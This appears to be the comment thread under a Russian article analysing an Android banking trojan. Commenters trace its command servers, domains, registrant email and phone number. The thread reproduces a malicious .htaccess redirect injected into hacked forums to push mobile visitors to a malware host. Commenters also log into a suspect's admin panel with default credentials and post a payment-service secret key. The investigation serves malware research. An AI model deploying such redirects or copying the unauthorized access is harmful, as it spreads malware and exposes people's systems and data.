Comments 71
Тут 2 варианта: либо вирус «китайского происхождения», либо ошибка кодировки. Думаю, пока рано делать выводы.
Возможно, что это такая обфускация.
Так же рекомендую параллельно использовать Fern Flower.
0
Что-то слишком грустно звучит «Не устанавливайте root и банк-клиент на одно устройство»
Как я понимаю, если зловред объявился, есть возможность этот момент контролировать через «Разрешения суперпользователя»?
Так-то устанавливаемые приложения под контролем, но мало ли
Как я понимаю, если зловред объявился, есть возможность этот момент контролировать через «Разрешения суперпользователя»?
Так-то устанавливаемые приложения под контролем, но мало ли
-1
его не удалить через стандартный менеджер приложений андроида, он выключает кнопки остановить и удалить. И не просит рут прав, просто падает когда кликаем на .apk. После он уже свое делает.
0
Вы меня немного не так поняли =)
Я про общую картину: практически любой зловред, использующий рут, может быть обнаружен стандартными средствами?
Я про общую картину: практически любой зловред, использующий рут, может быть обнаружен стандартными средствами?
0
а что вы имеете ввиду под стандартными методами? )
0
Под стандартными я имел ввиду приложение Superuser, стоящее практически на всех рутованных устройствах, в котором можно контролировать все приложения, требующие root-права
0
он был, но например 4.1.1 на телефоне он спросил хочешь дать права, на планшете он байпаснул как то
0
То есть, на телефоне еще была возможность предотвратить «вторжение» на этом уровне?
Насчет планшета: может есть различия в настройках безопасности?
Судя по всему, не так всё и плохо может быть с рутованными устройствами
Насчет планшета: может есть различия в настройках безопасности?
Судя по всему, не так всё и плохо может быть с рутованными устройствами
0
Извиняюсь за назойливость, просто не могу понять такого ажиотажа вокруг безопасности устройств с root-ом.
Ведь можно обеспечить должный уровень безопасности, если правильно им пользоваться, а не направо и налево раздавать права и разрешения
Ведь можно обеспечить должный уровень безопасности, если правильно им пользоваться, а не направо и налево раздавать права и разрешения
+3
минимальное — использовать хоть какой то нормальный антивирус для мобилы и таба. Я пока что не знаю почему и как он обходил, думаю в будущем разберемся, напишу новую статью. Не надо извинений ) рад ответить на вопросы )
-3
Насчет антивируса, по-моему, тоже спорный момент =)
А так, думаете, что контроль root-разрешений и отключение установки приложений из неизвестных источников не могут обеспечить должный уровень безопасности?
У меня, кстати, на выдачу root прав пароль стоит, чтобы не выдать их случайным нажатием на всплывшее окно, а в обычном состоянии root отключен
А так, думаете, что контроль root-разрешений и отключение установки приложений из неизвестных источников не могут обеспечить должный уровень безопасности?
У меня, кстати, на выдачу root прав пароль стоит, чтобы не выдать их случайным нажатием на всплывшее окно, а в обычном состоянии root отключен
+2
UFO just landed and posted this here
теоретически нет. Примерный кейс:
Получаем рут права.
Добавляем в систему свой бинарник для рута.
Удаляем данные у SuperSu (или аналога).
Получаем рут права.
Добавляем в систему свой бинарник для рута.
Удаляем данные у SuperSu (или аналога).
0
Пробежал http сканнером, нашел стату и админку:
abra-k0dabra.com/magic/stat.php
abra-k0dabra.com/magic/control
Далее погуглил по строке KeyHttpGate (http://avtesterr.com/venussa/gate.php содержит строку «KeyHttpGate abra-k0dabra.com/magic/gate.php» — видимо это механизм смены гейта),
нашел док.
Там указано имя малвари — Android/Crosate.A
Нашел несколько сандбокс анализов подобного, с 2013 года:
www.apk-analyzer.net/analysis/2683/13582/0/html
www.apk-analyzer.net/analysis/2230/11392/0/html
www.apk-analyzer.net/analysis/718/3954/0/html
Гейты малвари в .ru зоне, что не исключает «русский» след в самом начале жизни этого софта — тестили.
В этом пдфе немного описано про детект эмулятора в этой малвари.
Вот скан VT, тоже за 2013 год:
www.virustotal.com/en/file/964f6c1913c8f090cbcabb0f23d26e0a89408c1f2dda43a087159463bb3e07e7/analysis
Тут инфа посвежее:
malvertising.stopmalwares.com/2015/03/malvertising-androidsvpeng-androidcrosate-androiddeng
www.virustotal.com/en/file/324357f628d534eeae1674e6c3af9f3d4fad3e0dda5bc3fb782f1ed3b9a37dd8/analysis
abra-k0dabra.com/magic/stat.php
abra-k0dabra.com/magic/control
Далее погуглил по строке KeyHttpGate (http://avtesterr.com/venussa/gate.php содержит строку «KeyHttpGate abra-k0dabra.com/magic/gate.php» — видимо это механизм смены гейта),
нашел док.
Там указано имя малвари — Android/Crosate.A
Нашел несколько сандбокс анализов подобного, с 2013 года:
www.apk-analyzer.net/analysis/2683/13582/0/html
www.apk-analyzer.net/analysis/2230/11392/0/html
www.apk-analyzer.net/analysis/718/3954/0/html
Гейты малвари в .ru зоне, что не исключает «русский» след в самом начале жизни этого софта — тестили.
В этом пдфе немного описано про детект эмулятора в этой малвари.
Вот скан VT, тоже за 2013 год:
www.virustotal.com/en/file/964f6c1913c8f090cbcabb0f23d26e0a89408c1f2dda43a087159463bb3e07e7/analysis
Тут инфа посвежее:
malvertising.stopmalwares.com/2015/03/malvertising-androidsvpeng-androidcrosate-androiddeng
www.virustotal.com/en/file/324357f628d534eeae1674e6c3af9f3d4fad3e0dda5bc3fb782f1ed3b9a37dd8/analysis
+12
abra-k0dabra.com/magic/stat.php
abra-k0dabra.com/magic/control
мы тоже находили, но дальше не ходили…
0
По инфе с VT этом же сервере есть домен heibe-titten.com
Там PMA: heibe-titten.com/phpMyAdmin и гейт heibe-titten.com/dnr/gate.php
Домен регнут на armyawka@inbox.ru — секретный вопрос «Модель Вашей первой машины», на это же мыло регнуты:
Там PMA: heibe-titten.com/phpMyAdmin и гейт heibe-titten.com/dnr/gate.php
Домен регнут на armyawka@inbox.ru — секретный вопрос «Модель Вашей первой машины», на это же мыло регнуты:
abra-k0dabra.com [ 62.210.83.135 ]
anonyzmus.com [ 62.210.78.48 ]
casino-ambassador.com [ 62.210.86.232 ]
casino-olymnpic.com [ 62.210.86.233 ]
esset-nod32.com [ 178.33.225.144 ]
heibe-titten.com [ 62.210.83.135 ]
jerking0ff.com [ 62.210.244.63 ]
mego-bankasi.com [ 37.187.138.222 ]
porabowenie.com [ 62.210.244.63 ]
shortdomein.com [ 62.210.78.19 ]
venuss-pizdenus.com [ 62.210.244.71 ]
megogo-porn.com [ не резолвится ]
megooshop.net [ не резолвится ]
orgazm-girls.com [ не резолвится ]
porno2000allin.com [ не резолвится ]
privatbang.com [ не резолвится ]
v-rozetke.com [ не резолвится ]
girls-porno.net [ не резолвится ]
+5
Идём дальше.
Нашел через гугление полей домена нашел ещё один интересный домен, регнутый на armyawka@inbox.ru — apple-sh0p.com, IP: 37.252.0.192
на сайте указан номер: +7 (800) 100-22-69
CMS webassyst, по урлу 37.252.0.192 доступна админка.
Классика!
Логин-пароль admin:admin
Смотрим первый заказы в базе:
Заказ создан: 25 января 2015 10:08
Витрина: apple-sh0p.com
IP-адрес: 92.244.135.215 — Сербия
Скачиваем лог установки, находим путь на диске разработчика сайта: «D:\\Programs\\OpenServer\\domains\\shop-script.loc\\»
В общем-то реквизиты с сайта ведут на разработчика малвари или человека, с ним связанного, и судя по содержимому магазина — товар скарженный. Источник кредитных карт — вполне вероятно та самая малварь.
Нашел через гугление полей домена нашел ещё один интересный домен, регнутый на armyawka@inbox.ru — apple-sh0p.com, IP: 37.252.0.192
на сайте указан номер: +7 (800) 100-22-69
CMS webassyst, по урлу 37.252.0.192 доступна админка.
Классика!
Логин-пароль admin:admin
Смотрим первый заказы в базе:
Заказ создан: 25 января 2015 10:08
Витрина: apple-sh0p.com
IP-адрес: 92.244.135.215 — Сербия
Скачиваем лог установки, находим путь на диске разработчика сайта: «D:\\Programs\\OpenServer\\domains\\shop-script.loc\\»
В общем-то реквизиты с сайта ведут на разработчика малвари или человека, с ним связанного, и судя по содержимому магазина — товар скарженный. Источник кредитных карт — вполне вероятно та самая малварь.
+7
Мдя, пароль тут же сменили)
0
Логи с сервера:
pastebin.com/WjTFvi5J
pastebin.com/35XAXXZL
pastebin.com/3L0Nykm0
Данные UNITPAY, по которым можно идентифицировать лицо, владеющее шопом:
pastebin.com/WjTFvi5J
pastebin.com/35XAXXZL
pastebin.com/3L0Nykm0
Данные UNITPAY, по которым можно идентифицировать лицо, владеющее шопом:
Публичный ключ 12475-d1305
Секретный ключ 7b924291b516d1b406b3fb278b45ae04
+1
вырубил что ли сервак… сейчас недоступен
0
504 Gateway Time-out
nginx/1.7.0
Самое интересное, что такая реакция лишь доказывает то, что след был верным.
Через 10 минут после публикации доступов admin:admin они были изменены(тут я допускаю возможность смены аноном с хабра), но то, что сервер выключили, уже второй аргумент в пользу того, что шоп apple-sh0p.com аффилирован с малварей Android/Crosate.
Исходя из моей подготовки и опыта:), могу утверждать с высокой долей вероятности, что идентификация кардера упирается в запросе информации о вышеуказанных ключах через UNITPAY и уточнению владельца номера +7 (800) 100-22-69.
nginx/1.7.0
Самое интересное, что такая реакция лишь доказывает то, что след был верным.
Через 10 минут после публикации доступов admin:admin они были изменены(тут я допускаю возможность смены аноном с хабра), но то, что сервер выключили, уже второй аргумент в пользу того, что шоп apple-sh0p.com аффилирован с малварей Android/Crosate.
Исходя из моей подготовки и опыта:), могу утверждать с высокой долей вероятности, что идентификация кардера упирается в запросе информации о вышеуказанных ключах через UNITPAY и уточнению владельца номера +7 (800) 100-22-69.
+1
Я не отрицаю ничего, но это также может значить, что на сайт вломились анонимы с хабра и начали его ломать. Вот его и выключили.
+1
apple-sh0p.com/mac
база видимо удалена уже ))
Ошибка #2002
Магазин
Can not connect to MySQL server.
Please contact app developer.
база видимо удалена уже ))
+2
Такая защита — это результат работы одной из версий нашего продукта DexProtector, к сожалению, иногда, среди наших хороших клиентов, попадаются злые негодяи, которые во-первых портят себе карму и вредят пользователям Android, а во вторых приводят к false positive антивирусов для нормальных защищенных приложений, соответственно, вредят и нам. Если не сложно, можете прислать нам этот apk, для того чтобы мы разобрались с этим нехорошим человеком?
Спасибо за пост.
Спасибо за пост.
+13
Чувака нашли, бригада с паяльниками выехала :-)
+14
:-) хехе
0
А у Вас криптор-обфускатор водяные знаки вставляет с идентификатором покупателя?
0
Если не секрет, то по каким следам нашли? Жёлтые точки?
Кстати, в этом случае я даже за, если знаете только вы и «честно-честно» только вы.
(комменты пиши @ страницу не обновляй)
Кстати, в этом случае я даже за, если знаете только вы и «честно-честно» только вы.
(комменты пиши @ страницу не обновляй)
+1
Надеюсь, о результатах этой истории хотя бы в комментариях отпишитесь? Заинтриговали =)
+4
lenta.ru/news/2015/04/11/mvd походу вот продолжение
0
Спасибо автору за рассказ об инструментах. Как раз есть желание поковырять одно приложение =)
А может ещё кто-то знает про написание приложений на mono (тот что открытый .net)? Судя пл всему интересующее меня приложение его использует.
А может ещё кто-то знает про написание приложений на mono (тот что открытый .net)? Судя пл всему интересующее меня приложение его использует.
+1
Тут 2 варианта: либо вирус «китайского происхождения», либо ошибка кодировки. Думаю, пока рано делать выводы.
Там дикая смесь из корейских и китайских иероглифов + еще какая-то фигня. Так что происхождение здесь точно не причем.
0
Я вот только одного не понял, как оно установилось то? Может упущенны какие-то подробности установки?
| заметите, он меня не спросил: «Ты согласен установить это приложение? Оно будет использовать такие-то права.»
| заметите, он меня не спросил: «Ты согласен установить это приложение? Оно будет использовать такие-то права.»
+3
просто кликаешь на apk и все, он уже установлен
0
Установлен ли «Unknown sources», есть ли права root, контролируется ли предоставление привилегий?
Если на все вопросы ответ нет, тогда уязвимость сосвсем в другом и уже нужно подумать о безопасности самой системы?
P.S. Какая версия android стояла?
Если на все вопросы ответ нет, тогда уязвимость сосвсем в другом и уже нужно подумать о безопасности самой системы?
P.S. Какая версия android стояла?
0
Комменты оказались не менее интересны чем статья. Целый детектив.
Пил кофе и с большим интересом читал.
Спасибо.
Пил кофе и с большим интересом читал.
Спасибо.
+8
Это ещё не всё — я регнул один из старых доменов private-area.ru и на данный момент зафиксировал за 8 часов обращения ботов со 1240 IP адресов, раскиданных по миру.
Как соберу немного статистики, допишу в этот пост.
На данный момент собраны обращения к файлам:
Как соберу немного статистики, допишу в этот пост.
На данный момент собраны обращения к файлам:
/arigwfjlet.lui
/canada/gate.php
/china/gate.php
/estonia/gate.php
/evbkjnucvg.xky
/fkcdweleaj.xcz
/greatwall/gate.php
/israel/gate.php
/japan/gate.php
/kmepukizmy.qyx
/new/usb.php
/oxiqimfegl.swo
/plvkmxoeuc.vut
/reich/die_antwoord.php
/ugvodldbcl.ont
/vietnam/gate.php
/xkey/xtrapay.php
/ykey/xtrapay.php
/zkey/xpay.php
/zkey/xtrapay.php
+2
Вы бы поаккуратнее с такими регистрациями. Понятно, что дело интересное. Но сейчас создателей вируса взяли и начнут собирать доказательства по этому делу, а там домены из их пачки зарегистрированные на Вас. Может не очень приятная ситуация получиться.
0
Домен private-area.ru также участвовал в 2013 году во взломе форумов на VB.
Злоумышленники добавляли на сайты следующий код в .htaccess:
Видимо взлом форумов был первичным источником трафика для Android/Crosate.A, мобильный трафик со сломанных сайтов пересылался на private-area.ru, далее какой-либо фейк обновления флеш-плеера, и дальше малварь попадала к пользователям на устройство.
Злоумышленники добавляли на сайты следующий код в .htaccess:
#########rataman##########
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly\ v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk\ |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew\ |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg\ |sonyericsson|samsung|240x|x320|vx10|nokia|sony\ cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|alav|asus|attw|au-m|aur\ |aus\ |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55\/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez40|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-mo|g1\ u|g560|gf-5|grun|gene|go\.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp\ i|hpip|hs-c|htc\ |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc|i-20|i-go|i-ma|i230|iac|iac-|iac\/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt\/|kpt\ |kwc-|klon|lexi|lg\ g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg\/k|lg\/l|lg\/u|lg50|lg54|lge-|lge\/|lynx|leno|m1-w|m3ga|m50\/|maui|mc01|mc21|mcca|medi|meri|mio8|mioa|mo01|mo02|mode|modo|mot\ |mot-|mt50|mtp1|mtv\ |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102|n202|n203|n300|n302|n500|n502|n505|n700|n701|n710|nec-|nem-|newg|neon|netf|noki|nzph|o2\ x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc12|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55\/|sage|sams|sc01|sch-|scp-|sdk\/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb3|smt5|sp01|sph-|spv\ |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft|sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli|topl|hiba|up\.b|upg1|utst|v400|v750|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vulc|w3c\ |w3c-|wapj|wapp|wapu|wapm|wig\ |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu|x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz|brew|brvw|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom|inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok|leno|lg-c|lg-d|lg-g|lge-|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|rozo|sage|sama|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60|vx61|vx70|vx80|vx81|vx83|vx85|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|xda-) [NC,OR]
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
RewriteCond %{QUERY_STRING} !wpc_nr [NC]
RewriteCond %{HTTP_USER_AGENT} !(iphone|ipad|ipod|iphone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]
RewriteRule ^(.*)$ http://private-area.ru/retro/ [L,R=302]
#########!rataman!#########
Видимо взлом форумов был первичным источником трафика для Android/Crosate.A, мобильный трафик со сломанных сайтов пересылался на private-area.ru, далее какой-либо фейк обновления флеш-плеера, и дальше малварь попадала к пользователям на устройство.
+4
www.cnews.ru/top/2015/04/09/troyan_dlya_android_voruet_dengi_s_kart_sberbanka_594784
Троян для Android ворует деньги с карт Сбербанка
Пока не понятно совпадение или…
Я смс функционал тоже находил…
Троян для Android ворует деньги с карт Сбербанка
Пока не понятно совпадение или…
Я смс функционал тоже находил…
+2
Вот вроде как поймали:
www.forbes.com/sites/thomasbrewster/2015/06/02/video-shows-epic-russian-twin-hacker-arrest
www.forbes.com/sites/thomasbrewster/2015/06/02/video-shows-epic-russian-twin-hacker-arrest
0
del
0
Sign up to leave a comment.
Исследование андроид-вируса